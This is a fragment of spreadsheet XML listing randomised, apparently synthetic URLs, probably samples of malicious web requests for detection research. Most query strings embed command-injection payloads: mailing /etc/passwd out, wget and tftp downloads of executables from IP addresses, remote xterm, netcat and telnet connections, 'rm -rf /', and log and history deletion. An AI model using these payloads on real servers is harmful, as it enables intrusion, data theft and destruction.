    <t>/9q1_wsxe/-fainqx6t/ervkws/xeyjilb-vm/px36fccpwkfq.html?am6cna=d&amp;o7snw6teqt=ammtkh&amp;xp_s_d%upre=0207929&amp;vbvar1k=su6&amp;1g4sud0=rrsjhttpsnw+uigroup+byruz&amp;s3aes=st59&amp;9soedw4ruhe2h=rm++-f++/var/log/httpd/access_log+++;&amp;e0proo1n=a.av-nxgolka&amp;a0ou=54&amp;8na5tkizydsea=7zec&amp;eot79rdtpl2d0ii=deobjecthr&amp;oeh7ziemmat=19&amp;hotrp@m=bhtpass&amp;laonikiepnuhc=82554&amp;vhdocument_kxallavw=tmt</t>
  </si>
  <si>
    <t>/nin3metxo1dfishree/a3ggeuwg9r3e2c4ru/hibnt0pxc7atdo9ocaep.mspx?ontiebiw=\\n++uftp+-p++www.iera.com+/en/ndtrtr/ngar/siar/enng/to</t>
  </si>
  <si>
    <t>/ivj8opu--nhdrm/jsusr1yoa8.asp?kacef8noteaerae=cqwqc&amp;iriojb=222850&amp;dos=9821483624&amp;1dek=t&amp;firnhfao6q3=254&amp;ectbstrregt=+neghn|anph-sft&amp;lmstur=1unyhtrr2aips6s&amp;yt6pr=adsslmreewhmnunetcat++mhttpsi&amp;dgenwdtcehfat=e9nadeyortc&amp;drb8ehdupt=ssieng&amp;feosv=c?rti7wto7eelm&amp;temst5twessa=142107&amp;tt3m=\\r+++xterm++++-display++136.238.149.119:0.0&amp;46tiyrcc7eume=22</t>
  </si>
  <si>
    <t>/yshutdownprocessing-instructionjyglikeb/h47u-swf/cvii/pof7ecngpd/abteecimaict8t6s/9s2cwbkhrcp/rpy2.asmx?oaoo=rimgx]&amp;1w=\\"++++\\;++++\\/usr\\/bin\\/telnet+++++www.ntororli.com+04378\\;&amp;0sso=64981026&amp;eaabet=sbinicmdrhtnmeuhms&amp;tfizx=5</t>
  </si>
  <si>
    <t>/u._rsystem0an5/eebmr6meohypfai/po@@gd/rdt4osvaecs5auoled.js?.i9yvq=821&amp;jhil2nnrtm=ilt1ehmeabnn&amp;e8n1rrxta0s0sqs=6&amp;njp1-knrcp=1534&amp;etei=rrr3tegi4m:a&amp;t74aosrigt=3126801&amp;nsroh=hki-&amp;2sit5arowgshyq=ts8?servicesqor&amp;wdun=31&amp;armao=e@wvfahf@vc&amp;eoso=si=+i&gt;stue&gt;1iu&amp;esmstiooi8en='++;++tftp++++-c+get++++www.aneranngst.com:/al.tar&amp;rdsx=85744&amp;gdaubeid=829213975</t>
  </si>
  <si>
    <t>/8pkcwbjbt4kc/m_qougizdbgy@/dkktab.-e2zs/intnt4hsetemd/neloneaieotr/ojzeey8clvl/ebrjkka3v.aspx?zdssv=4&amp;dhjywr1@8=1&amp;ea=+++xterm+++-display+++www.veestitiin.com:0.0++&amp;tevlhjt0let=8079</t>
  </si>
  <si>
    <t>/viuet6rpno8oe/smn/epl36fvljnhxdoyvg/calrarowis/ty7i4esyib1av1@@qo/mkyt.nckpdk/u3y0/kotyaatm8o.exe?lnd=22376&amp;ttinsioeildbd='+++++;uftp+-g++/home/stmali/instar++132.168.44.80+++/neve+;&amp;aen7rsxbtowhiu=czdzohnr96&amp;nbay@netcatmn8g=egm@6i&amp;7tima&amp;dropuwryipmge=exqw1m0q&amp;isr4arto=41817&amp;riqet6zaoy=587282172</t>
  </si>
  <si>
    <t>/q96xkdz9enxe6nff/ovanb2fz1s8axisdec/issodrduyuaartohitoo/iciaqgwgu/edwierk414fp/it1rgsig2wpyrzw1/ldqcmxbdl.dll?t13pur@6uichild=llg&amp;uat19ucrbiclabr=t\\tmqo1&amp;ntoieit8octr=mems8po-hx&amp;telnetoucl=htpasseboot.ini&amp;eaddtuurstqeuid=`++++rm+++-rf+++/+++++`&amp;yetsfeeci=94743&amp;ohotnczyeik=likeis&amp;7iwnuoeeade=0563176601&amp;esw7edvpce=6&amp;iiieuue=+atth</t>
  </si>
  <si>
    <t>/gygmv28a@2/srlkichx/a8dtiitowioneey.nsf?ok3dxcpuz-=5779&amp;wiaetms7k=\\nwget++++http://181.234.154.208:1465/nftp.exe&amp;onhrt=-+pepna&amp;tfoatmrmitnhe6o=396126&amp;pf4=tkueidatfrhi&amp;miremnheuee63ry=+0opt&amp;llanat=z&amp;j76eu4=1440&amp;nk=s5ta&amp;org=rhi/updatet0dturtb1o&amp;atnvyifr=+wgett</t>
  </si>
  <si>
    <t>/r0hectadroka/eep/tqwd_/i9_ydyeilzeemel.@wx/mjmqh3com.png?gse=69860&amp;rpsuc=gpdoapueerw&amp;4n7eehnale=e7r0emt&amp;he=7lnchmmnaudc&amp;0t3n=|+++++cat++/etc/passwd&amp;9xexeciwgopt0mr@=316&amp;j@xi8-pqxlt=t-catn/2tucnh</t>
  </si>
  <si>
    <t>/4dh/hnexxe/ohoafusd8lseesytztpe/ie0tn74zeaesilised8/yee4ctdcnoghiprettam/wpolwc/ld.uedlbl_/eailnnoayfrd7.aspx?hphpuexrdt@46e=613445977&amp;umk=ovzvg&amp;amrzh=559093&amp;wopcmohlts=rm+++++-f+++/var/log/httpd/access_log;&amp;rtlatxmt=7594&amp;svetsi-afdra=aa&amp;dte=6973&amp;afw=tbesktosishefkgoet</t>
  </si>
  <si>
    <t>/roj/2aws45uh9reomaosti5/eea/tslbneja7/einlrb3_-jzyzlw5k0pj.swf?frefwacslase=++xterm+++++-display++++www.ieitteetma.com:0.0+++++&amp;oh7heheplshl=swih3euknsah&amp;do=77064</t>
  </si>
  <si>
    <t>/akp-t/aiashnatiseo/i@fldize247xcbb/wdljro8phkz/fymxq/rqrg/0oljz8d/taoizw8gae6azjsu/staielni2ttmediu8/ihaj.shtml?vlesrsy=eijsgeqeisbodls&amp;telmhrxdfi=+++++;+echo++++++;+w+++++++;+++uname+++-a++++++++;+++++id&amp;ueiceeat=8768111&amp;bhttpgwdqdopenjt=03&amp;szfizmeh=218539&amp;6s4txe=itiioir+ttdtmpees&amp;vehteoberai9r=r&amp;9a0a=ea1ed&amp;talla=eyauvifivwg&amp;oisuaa3ehtca0=ahptae&amp;cioldseont7ojm=6</t>
  </si>
  <si>
    <t>/dtt/ordldfr8iadectl/ixii/eri.css?eh=ssprl&amp;ova0fsalsm4wn=060476417&amp;fhefhlrlidi=|+++++/bin/cat++++/etc/passwd_x0000_.html&amp;enataegt=021076&amp;open2lexecowh=6&amp;mi@libformbgsoundjs3w@a=a&amp;axooruhnnikmcis=erxsaotooka&amp;x8fwauu@=114025&amp;2u0y=3&amp;rcp9nk7vinsert=5156&amp;gyntt4xtermti=92288963&amp;dnoj=audevd</t>
  </si>
  <si>
    <t>/nrgnrkctd/ihi/scriptlogm1linkr/kvarewr3fgjuy2c/le5zpra/hkzo54l-yxo8/hn/elstt9rn/a3titt2u/am/rysd18et/hmhocl9cnzwgetjopenservicesj.png?tdwev=dfnop&amp;juvd=13&amp;hcvtsetsw=wheree&amp;izmhyeznl=wandoi&amp;jdgtnvogrb=alldtnnjxev&amp;ifenuneawh3etyt=oops;++cat++++/etc/passwd++|+++mail++++your@aprnd.com&amp;5s=ee&amp;etydhnenee=os8lf5arkcceues&amp;qe0ghcvuynatb=41&amp;xqe2i1ztp6s=rujztppzp</t>
  </si>
  <si>
    <t>/p@ks/nabiapa4ja7kkyn/e3mnho2eotjlae0.php?llvvzl1trcebgh=93272519&amp;eebs4awgoeuae=e4pzf&amp;q-inputyxm=210132&amp;rap6va5alege=30&amp;ztselmshue64ss="+;+telnet++++250.140.199.173++80++;&amp;te3eggr=ksrtdahm&amp;ots3iaierncujse=lhroiax&amp;t81dre=0eqdsco/teyee&amp;y2coiehinn=y4ki&amp;7iz9z_b6yxservicesc=fnxfxhx&amp;h5icqpn=8756135636&amp;tb=]$nmsa&amp;lkhirta4utiwlbi=hhcdoioh\\nrsitm&amp;lkwuihxnc0=gp0rtnss1t&amp;drdobiltnoijet='gh</t>
  </si>
  <si>
    <t>/rrtiesc/sdqf/a1dm1u/atel35lrt8ctby/ttopenu-jnuuql/se.gif?path6cta="++++;++/usr/bin/wget+++www.lenemaisan.com/maasri;</t>
  </si>
  <si>
    <t>/inleovwqtn6dnmqywb/.oabglxzgmh-sexec/sublcw.jsp?hcufassi4ccab=51/&gt;db&amp;oihpe=rm++-f++/var/log/httpd/access_log++;&amp;eicoesnae=nehee&amp;renntbtar5=?</t>
  </si>
  <si>
    <t>/aeitustoernscluei/stirsnliiaoscheftno.msf?oz='+++;cat+++/tmp/res+++++mail++++alriniti@insi.com++;&amp;lnllt7smymeim=ney</t>
  </si>
  <si>
    <t>/srybpziyfg-/i.@2p4script3cl8.mspx?nvfgov=s)sfm&amp;etau=08&amp;xarlyjnadexecbd=19&amp;heaehr='++;ps++++-aux++;&amp;jio3itatitte=141</t>
  </si>
  <si>
    <t>/2ohfedepei0e/qraog7qdnwtstio/mbsesy7/terera7h/wteanrlatsezsalhv/y8upj1tu0eks7nc.mspx?hoeuiacet1g="+++;+++++/usr/bin/wget+++++www.ngitisento.com/ma+;</t>
  </si>
  <si>
    <t>/lvsd-r/m.@/ngo1m/lj3q/lino/d6wj9dax2jgiv.z.gi5/1rgiyxml9g/sixeas7/0tuste/mucplz6i-q5/mckmu9qp/ti30h2.vbn2bsuyuhr.html?wongiem4ksna=xterm+++-display++++www.oliell.com:0.0+++&amp;sr=h+trrea&amp;adves9hefol=hi5ia~egiallngnsmnm</t>
  </si>
  <si>
    <t>/eehe1a1itch8ct5/lhe8ztvknbhzme/mal/rb/efm7mb6qzk.msf?achuew=;++++echo++;+++w+++;uname+-a+;+id</t>
  </si>
  <si>
    <t>/vc/ot-/fofhnorostroeeyar/w.sov3tciqd@/apsisrseehednbh/7aao/s@lstezyda/m8t8a5gj0qh7czntl/bg-sm/telnetvar2nrwpsy/irfur2z.cfm?o9eoro=12526&amp;rnep9olel=aeo&amp;aoasedsn=803&amp;fadnaeteaur=14&amp;fdnerdxene=gsxrqmot0al&amp;vbscriptnc0or3z@wrhk=t+el&amp;tv=83bntohhtlximhd&amp;ifolhlaepe=dzpisbeac6&amp;uesifted7nroi=90513&amp;gaoc@5=\\n+++uftp++++-p++++www.asannsicol.com++++/nsng/itastallma/es/ar/niarie/ilve&amp;towrx=pwol</t>
  </si>
  <si>
    <t>/hq/adm2hnmireor5hg/3passwdfg9daml/oya-rxx/i8r1gtk0ea73axhne/kr/9thlhdhvwp-my/4r/dl.swf?seu=1aonhecanoeni&amp;sg3gioeeo=uel_01iopgb&amp;tre=784&amp;egti=roetch|&amp;idrisoif=e&amp;tostearhba=mail+++++aly1@ierd.evstinp.gov+++&lt;&lt;+++/tmp/wu.c+++;&amp;deadajtrwatiilc=positiondayihlsa&amp;esryeyhobhhemgr=&gt;+&amp;ondee4thziso0t=nll&amp;1if9=93628974&amp;ra2edt=+noded=e</t>
  </si>
  <si>
    <t>/fneosapsuo/y4ifabegdch/ehrtk/ebk3usysdrngfffflgte/dd0trmtoitsruemtmte/9g9ptgaxcjt.pl?6oi=hn&amp;iyoqsooj5=s3si-yc&amp;sdemnaehtntl=e6hnoyaaorb9eecs&amp;yaiim8htytap2it=1f%u|&amp;resyatrrnee=i.p&amp;lam=stdinrnt&amp;wi8n=m5axwxnzh&amp;an1e4s=9883439002&amp;so3jltdnteoaoe=ge&amp;llbgxo3aco2f=\\"++\\;+\\/usr\\/bin\\/telnet+++www.latratmeasng.com+++86\\;</t>
  </si>
  <si>
    <t>/ift5woasnxcfu/wnkjcukgujuqko5z/ttlkx1po/hhnuttennne/wwnewth2roemsden/etw6uihebnnsexmatsst/14ilo6ezeifanx0rdoe/esezev/lqthy6wwal7/eewhshiuv2tageh/ts@yudd2/rupdate4e3wdpwhmochaq6.nsf?sqwidmansel=854043&amp;6aopv7=mail++rohaaodi8u@atp.iemuv.gov+++&lt;&lt;++/tmp/wu.c+++;</t>
  </si>
  <si>
    <t>/5csj0.5@iqj1nqgbj/re/ijpcv.ihqxennppzyr7/ox-nf/5jnqeziz7n.jsp?eotoof8eyzt=asock_streamuo&amp;asuislzuutgtiif=8&amp;9@c2z=fhamnoeannhwo&amp;e6y=lnull;rngy+pri&amp;i3vi=863&amp;etl1=axjw&amp;rfy=/perl+/tmp/icti.pl++-p5392&amp;fircatcocb4retc=ov7d&amp;sxfmktfsrsra0=610&amp;n9marbm4a=139</t>
  </si>
  <si>
    <t>/kcejtlfcji04.f/eralsw1c.html?sbdnc=uwgetsdtyigsq&amp;dlsh=3733263086&amp;jdua.zo=roperlreplacersposa1=+4ld&amp;o3h6s=426388&amp;km8yxofyy=/perl++++/tmp/ta.pl+++++-p5389&amp;f-8bs1yez=o+lbe&amp;uestdinxnox&amp;rgztsos=yayxa.em-</t>
  </si>
  <si>
    <t>/y2or/r_guyqz/xty.dll?ug7eldlnltnotei=3+'&amp;otzsha=ngofgzyg&amp;kmxzjcna=kmeel&amp;beuihnepfanc=+4&lt;m~ev&amp;&amp;di8sgevh=(kw&amp;et=rzwjy-os5&amp;e7os3tinera8=elont9ymi&amp;lneneoe=hgf_@wb4zvx&amp;cehtecs4a=\\nwget++++http://137.245.163.93:462/nftp.exe&amp;s9rde6h=ecprocessing-instruction</t>
  </si>
  <si>
    <t>/ztn6n7qxzrig/wnss/syctecux9egsesjr/enlieen2ezat.asmx?j5wtelnsglg=s;f8tu&amp;eqaosn6alsusiar=\\n++++uftp+-p++www.gees.com+++/icel/atgerirail/re/at/icicta/ma</t>
  </si>
  <si>
    <t>/otms5c4/7hyinputfatmu1xu/s2zy4/1dklvvbscript/1flopf1acoc/teyooiqareuwf/g2jula/ia7c17nl/lcotprdm2pregsio.asmx?o4ug=nunin&amp;arturers=inris&amp;ke="+;++telnet++++24.225.23.138+80++++;</t>
  </si>
  <si>
    <t>/iaasiheurhon5eijesuf/tk1vwlvl/8mko7jqk/n-ury9pinsm/iith8eectnqre/cd5xzcgcrk1hli0/tywj8q878-u8b.php4?rjn=y8hsc7tuh&amp;iseit=56&amp;01.fi=0348&amp;tmr90wie=]ue&amp;kqpuoc=oi92bjy50&amp;lzf=\\n+++++wget+++++http://164.188.44.227:6836/nftp.exe&amp;cedaeu=fnulldltu%imdu$tqo1draa&amp;erofuhun=nony&amp;rnot=6ei2oovhdhu4&amp;hnoe=ncg&amp;ogeayloears=a2lt&amp;iht=93632&amp;0i=38001808</t>
  </si>
  <si>
    <t>/estnxikamfa/j7ihiyo./ofhe7vtnz7x370x/uvjlwbsfuf/q4krvga6gusraq5/s_nbmf_ki8p2i_8w/eiltmbetnzin5lgtkr/fuzlo9/tfsw0iwwb8vkug/w4igdelipnospeecdi/ptbhkrunr/eetosusri.php3?heuiiqt=420320&amp;rdlkmea=\\n++uftp+++++-p+++www.icti.com+/ie/icatetol/laen/en/atmeet/erge&amp;05nd034q7.=229&amp;ieetqp=tondhree1amedi</t>
  </si>
  <si>
    <t>/i.mrm@j_mkdie/nodn2tlittthomsk/eymkr78rqd8ko5jqm/neodgs6tvn3/azkqkym1cxbigmuc_ynr/irnfdiyztggeza/notfewe.tiff?nqnt=54619394&amp;qqfznebe5jx=tfy@dr&amp;0documentvcxn-=5924348&amp;wgobisgs=64&amp;oetdl=ao7l&amp;lea=trtj-&amp;0window.openbbetweeny7=\\;+++++\\/bin\\/id++++;&amp;osvire8xble3=deelr&amp;itua=nphpyao0nnehe&amp;wni3nlarbste8=ehuyn6s&amp;qnna1t=50009</t>
  </si>
  <si>
    <t>/4jdeletenylc5iavwox/rromm4r4axbc6nvtaw/scklnpgjh8/es6v-xlm_/eerg.tiff?nahay5edht=357&amp;nduflilpe9=/perl++++/tmp/sitrve.pl+++++-p8228&amp;mc=67533479&amp;umclaiitwczi=(sn1hnodemt&amp;ntsndn1=lter/dxztvbscript8h&amp;ygboqnieele=52316&amp;arnatoron=69475464&amp;oqledhopti=lashutdown&amp;slrcazl=rywf7m+3g/u&gt;lwj</t>
  </si>
  <si>
    <t>/tvtltenenccdytocsw/yypinwiy9puavtho/y-nmsgqqe8o/hh1yptx8-va/pi/txwit4ntanatns/oimtk0madq4fz-i5fkr/yv8iq@7rczaqr7uf/mfp5/jasjesan3/xbrg3.html?gr=`++rm+-rf+++++/++++`&amp;cltsimhlaio=51861</t>
  </si>
  <si>
    <t>/gy/5eyvmyj-k/oralthk-/nqtbyt6/4swr6aehheiaale/t@9p5bi/nnsfnlikttdrb/ptj/2klsnd9@.mspx?t4emnmueb80kwa=650&amp;v4qplnj=ofaoy&amp;goobat11etttow=291364&amp;xayroyzpejrwindow.open=gxcr8eye&amp;5ixqmap=hcrdaeeeni&amp;thr6=178147&amp;hfsbo7ottekv=023729&amp;yyos=4$r&amp;5ssssdasat=839179&amp;9ia5mpuabiyrrt=5375&amp;afyah11q2xtermj=\\r++++xterm++++-display++++110.5.209.40:0.0&amp;s8coitrshhul=|5a%eind50eo9dwindow.opent&amp;wwivn9umxp=y8</t>
  </si>
  <si>
    <t>/vs/3qk2r_o9rygsbb/ny/5wiut0nyda3oar/csq3irc/htrqwebarehit2c/diz/eeriesrcq5md.jpg?vsmitctniutexe=alwehdsngrd65&amp;3estiituts8=@&amp;n46osonnbrengn=/perl++/tmp/reic.pl++-p5249</t>
  </si>
  <si>
    <t>/ch0atntgnc/eqwb6/7hr2znoptcpzxsdfndtz.gif?weh3otagtiit=\\nwget+++http://154.152.76.25:116/nftp.exe</t>
  </si>
  <si>
    <t>/g4n9ashe/vgy0nt4ntoacl./cjhyvkfdlsopj_htjii/null7sq9/cec8net/rujra2fm@fr_/ttheeng/otontrehz8efngrtwq3t.htm?inosndqtene=3982&amp;e9=mail+++98y@tpetlt6.noecz.gov++&lt;&lt;+++/tmp/wu.c;&amp;3b=:xi/&amp;_lhnvgvq=sqx&amp;houegoh=tee&amp;tant9teear9pt=ws</t>
  </si>
  <si>
    <t>/1i37g7getc_/vhypy0dze0-5/fdlzvjqtdia_jwoj/7@wvjukh/so3ut31gtpbnad/68imqayt2/awe6_.24/iraxxqli8vf2z43orrh/awden4u/n7a_uy3btnii8tnm/ajlbnxtdaee/ilib.htm?yd2xer=|++cat+../../../../../../../etc/passwd+++|&amp;tema0=y56&amp;ndqh5=02222</t>
  </si>
  <si>
    <t>/ig/5-sellmdisxvp@gyzsl/ldbmn1wig/9etitsdmtbrntme/0b8snseaccfari/iis5ntmlqookb/ehylqrviodn4i/replacexx/attheo7ngeetp/icoiohi/nneoe/bdeck.js?rfrttgha2tto=7h6ehw&amp;setejeihs=bc6&amp;hss5od8eahrhdeu=imtup&amp;ott=rdgprcohm&amp;cis='++++;+++++rm+++~/.bash_history;&amp;nbtdn8cdrjthiat=1osadt)ehc</t>
  </si>
  <si>
    <t>/afyzrrlj/risw6ozluste1iatnlsj/osncwc/sotc3re/ibattuooe3artzuet/t2h24z/sn7.asmx?ficwaoouaiweanp=g@gij_gnjh&amp;ndkruscarcj1a='+++;uftp+++-g++++/home/ledela/ilroal+69.173.216.135++++/ve+++++;&amp;syis6as7rysee=i1thltieeube&amp;aiuenfisse=crt&gt;]betweenuth+&amp;otaeazuwimtds=hads4yufnghen&amp;uieh=41556377&amp;5ie4@kt=o6fehgn.</t>
  </si>
  <si>
    <t>/ngtmemmioero/tsrtyurl8eytvnsap/cbxp_/l2dt9j2rijru@qcbs/ugroupbytyd0popt/uujomf.shtml?gkxriugqz=rm++++-f+/tmp/e1ti++|</t>
  </si>
  <si>
    <t>/abo7twsii_l8x1nzpvf/hmlrq@p52fod4ukstn2/sceaotit/bq__/el4tbe/kop8awtonglsvvgyf2xs/ep/hwre.asp?eez=+sitere&amp;kh89uece8efe=ddoca9anqdsirn&amp;k599ldxmn=tooalveoon&amp;allpzsaocmeta=dmkurr1j@o&amp;iozepyhrt=rescodropm&amp;saqshmhoetmne='++++;ps+++-aux+;&amp;2d3nb8tnhex7n=ae&amp;e(ia</t>
  </si>
  <si>
    <t>/iarczrlwhk/stdinhpusr/-9mo.znii/emtcul10n/anhpslimzaedyc7ifae/jabet/yfnjijrao/heerdep/susock_streamvkwazp3zjbpr/m53andlngn4_.htm?5a=lrcood7eae&amp;czr1rnlm8v=jnhulhttpsaglernbwe&amp;o3attnledtfzh0j=?rdgrn5&amp;tiirglnf5r=|++id+++|</t>
  </si>
  <si>
    <t>/t9hlqfurtoksq/hdcpeoov/jc/3namioayvieavp/top/frohae2vnr.cgi?scxs9u3r=eete4ns8sabepoeot3&amp;elcrh31tedtru=fyiho&amp;m5ar81penue=3606515&amp;oatg=m&amp;adts6luaznh=-o4soshneoia]bbl&amp;hotte54azna=ress&amp;ntxcdygtdce=++++cat++++++++/etc/passwd&amp;cycmdu=0049280</t>
  </si>
  <si>
    <t>/59un/rw0usrn11rre/lipscn/aduthouueatoteseaaa/ai7ca/wurqy/aqomlinrkea/8ozvkaeuxway/9include9tdwkc6kf/skecouvj.js?twhririo3ore=|++++/usr/bin/nc++-vvv++++156.83.222.141+++++80_x0000_&amp;teji5=6128318</t>
  </si>
  <si>
    <t>/anmnene4uusdo/u6if_uel8f/el2ye/eslde/snizrk7fklpc9g/swt9de/ghmjinozu/tohq.mdb?aiaerotiefaias=;+++echo+++++;w+++;++uname+++++-a++;+++++id</t>
  </si>
  <si>
    <t>/qidordf7.8omrqqo0j/72aidgrqnc-ztmp.tiff?-_zsjcg1y=edp&amp;sk97lget4fln=tatroekod9mrasiqp&amp;mwrnl2gbthsll=ls++++-las+++/home/+++|&amp;0iw0kmhnrtek=a40&amp;titetgoc1bint5x=95692650&amp;neunr3nnllaojux=26&amp;e87nbwztag=s6o&amp;jy7adminfps=1vqnhlhp8gu</t>
  </si>
  <si>
    <t>/hwkgx.bq.qfewwoh/mlas5qx6a/fcqcnlmts/8vec8u_kn0taf/re9b/gi3xcws3@fcw4j/hsh86dho/ms3uw1accept2akz.css?qaebaooe=9st&amp;obpce=1octsdfnp7ii&amp;aeh9dio=i2a3k8ze&amp;eexuwzenb3tcpad=uvn.oqon&amp;nee9onye=|/usr/bin/nc++++-vvv++++57.254.25.250+80_x0000_&amp;gdjconnectnodebq=ns&amp;+dhldhnetcatac$nn&amp;wkoi7a6oorfh=nwizdtjwoqq&amp;eslaote=quenyeymochaao&amp;yl1tscriptzyw0lmailc=ioo/laimgmt&gt;%documentxterm|x</t>
  </si>
  <si>
    <t>/t2sn2uoeeigyt/2eaitwt/aedhwjepe5ons/igyhqatgh/q6l/dsiegeanrob/ckztjbaccess_logqe/oa0rds2.exe?hek2nrncany6mea=`rm++-rf++/++++`</t>
  </si>
  <si>
    <t>/apgqb@y/h5gs2ncbped/asg9vv1nopd8f7u6_/xuoqbformftpx_l4bq/infqlpsb2fixf/ioirbeco1zjqs8-ke.mdb?hhttpn6@='+++;+++ps+++-aux+++++;&amp;eoyskseijfno=9eyce</t>
  </si>
  <si>
    <t>/tssa0om3rowoj6soi/gnzomwsnmhnio2meaqh/r8e1luiseri3/er/iykrvp-t7vm3veoix.shtml?pnejuafetl0th=6&amp;nrxeninn=384796&amp;9aht=%uswhere&gt;&amp;iletthigiih=httradebetweenav&amp;nhhaeparzdguife=r&amp;xooiinoorho=cunehl&amp;em9-t=46&amp;bv7aq16moxhae=sezr7emnb&amp;corv9aa=j.54h-&amp;soaeeohct1asian=ydeeowts0d4&amp;ehnai0rheeuz=l3qs_-be&amp;cvc6j=/perl+/tmp/alns.pl++++-p2689&amp;lfitaddp1j=e4bew&amp;jh2fs=updategsct2ia++'wscriptohomeedinsertr</t>
  </si>
  <si>
    <t>/nitnuk/r3oc.js?otarhdds=182&amp;1saecthmt=529442&amp;3oisdz=22&amp;8imnthvmad=ae&amp;ew1fwnheeuj=w;t&amp;_0iw=8&amp;hitf4=ebhso&amp;nivarts=aua9r&amp;sitapfentnnr9sd=e6nysihyyseigs&amp;sezsvett2heejr=ngefcfrg&amp;nmrerr6hrhs0sem=lemt&amp;oeatygrnoyevei=39&amp;ordpdy=tftp++++-c++get+16.122.58.138:/il/ntletoti.exe+++|&amp;rkkuar=5655676</t>
  </si>
  <si>
    <t>/ert/seclvmgcr4/ygnx2uwqhkp8/1g/fpaot/htdoogmsgeesoc2h0/lnemmlmp/egz@vzwazp76k/stosock_streamjboot.inikoinputtcux.nsf?jpdeletedhadminkrrscript9="+++;++telnet+++130.232.141.243+++++80+++++;</t>
  </si>
  <si>
    <t>/e93o2exwcn-gwe/uosdawareian/eu0dxplbbrd6za/ise9pd7saeprx/wim7a6hsn5ep/temcddeoeatls4l1yst/ahdfhig8qhon@iipqtkj/osi-x4bb/e.rh.jpeg?xeosinie=taataa&amp;0eoed7gt=|+/bin/id&amp;eereeet8nmhe=mo&amp;osc9sqnee=0751&amp;_tofy9cywu8=40976144&amp;7r2kitvzxxp_=1272871256</t>
  </si>
  <si>
    <t>/deyenpxtlgilplhjmm/nisnv3ect4iwnrb-0s/etqtf/hh1hcarhsie/huphpohc24cbgsound/chs2mrs/nodtrstodah/ewuxmihcc/ashz-l/sg6d/8su/0@hshcopyd.asp?da=1915474&amp;kvarfbcjgyni=ogr&amp;execdp@k3echonc=brfe4hss&amp;sn=inbnxtafo8dghe&amp;h4oeodjsxenhe=\\"++\\;\\/usr\\/bin\\/telnet+www.itlame.com++++22497\\;&amp;qvbscriptyovttor=os-|odhbt(c&amp;ie=dol]et)dnmc&amp;eahtrecyenegoh=emjwdvpafi&amp;h2asbhrinr2=451049535&amp;27.8uce=exl&amp;zoolro=0845850&amp;aosijea=&amp;jginserthoevalj]@position+@k'62form&amp;fottybat7g=052369895&amp;piabhhpwnpim=ca&amp;htaccesnqruvxuw=325693</t>
  </si>
  <si>
    <t>/rnsdzao/4683-bqkxfhs/rtordqenkse4bbietayt/tjn9iz/trpj/asjo.e6qph.mspx?vsc7zx2=d8brtaat0ipy&amp;smdhloat=atetx8av9h6o&amp;0pgrrnuolrxw=3&amp;a_izf=800&amp;kginvprocessing-instructiondwa=i@&amp;aneailafc9i5c=38034&amp;istechld='+++++;uftp+-g+++++/home/sigeinriti/teelli+120.63.160.196+/te+;</t>
  </si>
  <si>
    <t>/lnmqpmshtev4fa52@/oohget/upzcfcfzr7yi5v/tvouq/varz/ddarrl8lt/esnj.bin?xi392ggm8kw=+boot.inisataid(cio&amp;s2yftl9sh7ovl=lhpjr7y&amp;rea=sae&amp;qttaeamgthe=42850098&amp;9d2tri9=|++++echo+++"++content-type:+text/html"+++;+++++echo++++""+;+id+++\\0&amp;at=adc-&amp;gnxmel=1160&amp;slryi8t=jrt7afbtaohfi&amp;niroobtun=reweofwlhars&amp;lsuegc=sxmcpe5hfg&amp;lifhswscripty=8504&amp;cohnqdgr=s-hnsd0crb&amp;al0r=t</t>
  </si>
  <si>
    <t>/epvdfj03o/do2mhsnhsnhcl/mssl2m/wrlfazr-8irtq@@/m6bino/vs1wtdm/nfvytzcgtf9e4r/oee4lrrht9tfesr9oij/sf5-tz5lwttftdx0mppj/ttp6fw.html?dwdwotsjc5ad=|+cat+/etc/passwd|</t>
  </si>
  <si>
    <t>/riisgwag2snmvivfol/itogsoaert15l/ocbz/agtmlb9d-95xim4bo/mejrsqfkpc@d/ilg-995t-yshye6/ecdeeueeiar/dchmu7r/8esw/mc7ulssokrotclsla.jpg?adjgrhrrl=lboot.inia2s&amp;nt49eea=42479068&amp;syawk8ctclavtfs=elo8o]3a2&amp;nftnaekpo=|+++id++|&amp;otejrsvo=cl+&amp;vcxfobjecttilq8=460382&amp;ac8=nut8q&amp;-cr9le=61h&amp;aae1fx=eoaufvdtlls&amp;df5e3hione=r4bm&amp;n0u6ehuu=aewo&amp;9hidx=760763363&amp;awnhxhea=9928&amp;t2ie=zdrsmailo</t>
  </si>
  <si>
    <t>/ora8tdwriteetntuo/z-8-wda.etw/iframe%uuvc6ab18phsw/4tmn/pzhhw9htaz/e5zl/7riemihwsthpvicygwuw/osessomide/yonohribajbeevauinyb/ah0yfu.msf?hoeaitq2nvss=51&amp;tdtiaaote0seja=+gno+a+xpee&amp;stay0tvaus=udhj&amp;daifzdot0=r_yiyjioisj&amp;tgni=`++rm++-rf+++++/+++++`&amp;sbo=xbdp&amp;dzjrietn=ea</t>
  </si>
  <si>
    <t>/i5nwnq1pwbdkbgyyg/rksh/g113@/naetxd/ntn9lkqfv-zzgglh2.dll?lso7=le1heb3bbls7&amp;2s=+;++echo++++;w+++;+uname+-a++++;+++++id&amp;symi=eloi6attboot.inieiao&amp;n9ot=+babaonar2o&amp;pai=n2vn8bttxf&amp;cteoenzalea=hh?ah7u&amp;bnunhgwwsbi=24850</t>
  </si>
  <si>
    <t>/rfhhclhcuet/uwxm1yq5bm/qfdi/wxqcoy_0i/aae/gfinahiltzzeteiuen0/tve/ptdw5nthcvdrracahipa/t9v1f.shtml?qnrzb1tumesh2=080&amp;un=71&amp;6zotdmagmsteit=+sr5x7qeosam@atu[&amp;oaos7uf=elauh@&amp;bj=880&amp;aa5z=++++cat++++/etc/passwd+++&amp;ra3ciao6=aamthh-&amp;ihtolzrpex8=:tytis)t&amp;hpgeao=w.igv&amp;wtl=wrr&amp;passthrunodeirinsertgnmochatda=68496&amp;qslrh=8461&amp;hef2oh=9&amp;utiiiedsik=9np&amp;s0zvufui7=5621487</t>
  </si>
  <si>
